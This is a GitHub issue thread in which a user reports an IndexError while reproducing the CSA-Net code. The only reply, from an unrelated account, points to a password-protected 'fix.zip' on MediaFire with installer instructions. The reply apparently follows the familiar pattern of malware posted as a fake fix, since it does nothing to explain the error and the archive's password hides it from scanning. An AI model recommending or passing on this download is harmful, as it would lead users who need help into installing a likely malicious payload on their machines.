### ISSUE TITLE
IndexError: index -1 is out of bounds for axis 0 with size 0

### ISSUE THREAD

**Issue by WHloveHZN** [mirthAI/CSA-Net#2]
Dear Author, I encountered an issue that I am unable to resolve while trying to reproduce your code. Could you please provide some guidance? Thank you very much! Additionally, this is truly a very creative piece of work. Sincere regards.
![image](https://github.com/user-attachments/assets/1cc571f4-1494-46a5-a4ea-e9d6c2022a6a)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
